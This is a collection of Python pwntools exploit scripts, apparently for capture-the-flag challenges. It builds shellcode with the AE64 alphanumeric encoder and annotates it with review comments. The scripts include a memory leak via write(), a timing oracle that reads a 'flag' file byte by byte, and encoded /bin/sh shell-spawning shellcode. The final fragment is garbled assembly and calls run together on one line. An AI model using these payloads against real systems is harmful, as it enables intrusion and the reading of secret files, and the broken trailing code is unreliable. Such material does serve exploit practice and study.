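def attack():
    """Drive the two ``>>`` prompts and deliver a 100-byte write() leak.

    Relies on module-level pwntools helpers (``sla``, ``sa``, ``p64``,
    ``asm``) and the ``AE64`` alphanumeric encoder, none of which are
    defined in this block. Pure tube I/O; returns nothing.
    """
    # rsi = rcx & 0x0ffff000: `shl 36` / `shr 48` isolate bits 12..27 of
    # rcx and `shl 12` puts them back in place, i.e. a 4 KiB-aligned
    # address taken from rcx. Then write(1, rsi, 100) dumps 100 bytes of
    # it to stdout.
    # NOTE(review): why rcx holds a useful pointer at that moment is not
    # visible in this file (presumably a syscall return address) — confirm
    # against the target before reusing this leak elsewhere.
    shellcode = '''
    mov rsi, rcx
    shl rsi, 36
    shr rsi, 48
    shl rsi, 12
    mov rdx, 100
    mov rdi, 1
    mov rax, 1
    syscall
    '''
    # 'rax' is the register the encoder assumes points at the shellcode
    # when it starts executing (ae64 convention — verify for the target).
    sc = AE64().encode(asm(shellcode), 'rax')

    # Second-prompt payload: 0x14 bytes of filler, an 8-byte zero, then
    # 0x44440000. Bytes literals throughout: p64() returns bytes and
    # str + bytes is a TypeError on Python 3 (identical on Python 2).
    # NOTE(review): what the target does with 0x44440000 is not visible
    # here — presumably an address it later maps or jumps to.
    payload = b'a' * 0x14 + p64(0) + p64(0x44440000)

    # First prompt: 0x24 — which equals len(payload) (0x14 + 8 + 8), so this
    # is presumably the length the target reads next; kept as the literal
    # the original exploit used. Passing an int assumes the sla() wrapper
    # stringifies it — confirm if the wrapper forwards straight to
    # sendlineafter().
    # Debug breakpoint used while developing: dbg('*$rebase(0x1215)')
    sla('>>', 0x24)
    sa('>>', payload)
    # Debug breakpoint used while developing: dbg('*$rebase(0x1204)')
    sla('>>', sc)
    p.interactive()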
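def exp(offset, ch):
    """Run one probe of a byte-at-a-time flag oracle.

    The shellcode opens "flag", reads 0x50 bytes of it to 0x10100 and
    compares byte ``offset`` of that buffer with ``ch``: on a match it
    spins forever, otherwise it calls exit_group() so the process dies
    at once. The caller (not in this file) presumably tells the two
    outcomes apart by timeout.

    Args:
        offset: byte index into the read buffer; the read fetches 0x50
            bytes, so values >= 0x50 compare against whatever happens to
            be mapped after it.
        ch: candidate byte value, 0..255 (an int — it is pasted into
            ``mov cl, …``).

    Raises:
        ValueError: if ``ch`` is not in 0..255.

    Talks to the module-level tube ``p``; returns nothing.
    """
    if not 0 <= ch <= 0xff:
        raise ValueError("ch must be a byte value 0..255, got %r" % (ch,))
    code = asm("""
        /* "flag" NUL-padded on the stack: a positive 32-bit imm is
           zero-extended when pushed as a qword */
        push 0x67616c66
        mov rdi, rsp
        xor edx, edx
        xor esi, esi
        /* open("flag", O_RDONLY) four times; read() below uses fd 6, which
           only holds if fds 0-2 are open so the opens return 3,4,5,6 --
           confirm against the target's fd table */
        push SYS_open
        pop rax
        syscall
        push SYS_open
        pop rax
        syscall
        push SYS_open
        pop rax
        syscall
        push SYS_open
        pop rax
        syscall
        /* read(6, 0x10100, 0x50) -- 0x10100 must be mapped writable by
           the target */
        xor eax, eax
        push 6
        pop rdi
        push 0x50
        pop rdx
        mov rsi, 0x10100
        syscall
        /* rsi survives the syscall, so index the buffer through it */
        mov dl, byte ptr [rsi+{}]
        mov cl, {}
        cmp cl, dl
        jz loop
        /* exit_group(): build rax with push/pop instead of `mov al, 231`,
           which keeps the upper bytes of read()'s return value -- a
           negative errno there would turn this into an invalid syscall
           that returns -ENOSYS and falls into loop:, i.e. a false match */
        push 231
        pop rax
        syscall
    loop:
        jmp loop
    """.format(offset, ch))
    # 'rdx' is the register the encoder assumes points at the shellcode
    # when it starts executing (ae64 convention — verify for the target).
    sc = AE64().encode(code, 'rdx')
    p.recvuntil("Are you a master of shellcode?\n")
    p.send(sc)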
from pwn import *
from ae64 import AE64

# Verbose tube logging; 64-bit target so asm()/shellcraft emit amd64 code.
context.log_level = 'debug'
context.arch = 'amd64'

# Minimal local example: feed an alphanumeric-encoded /bin/sh shellcode
# to ./example1 and hand the tube over to the user.
p = process('./example1')

# shellcraft.sh() spawns a shell; AE64 rewrites it as alphanumeric bytes on
# the assumption that r13 points at the shellcode when it executes
# (ae64 convention — verify against the target).
encoder = AE64()
payload = encoder.encode(asm(shellcraft.sh()), 'r13')

p.sendline(payload)
p.interactive()
add [rsi], r15 jmp search ''' shellcode_1 = ''' /*长度不合适*/ push 1 pop rdi push 0x1 pop rdx mov esi, 0x1010101 xor esi, 0x1611181 push 0x1601101 pop r14 xor r14, 0x1010101 push 0x1011101 pop r15 xor r15,0x1010101 search: add r14, r15 /*r14: addr*/ mov [rsi], r15 mov [rsi+8], r15 push SYS_writev pop rax syscall jmp search ''' payload = AE64().encode(asm(shellcode, arch='amd64'), 'rdx') print(payload) #gdb.attach(io) sn(payload) irt()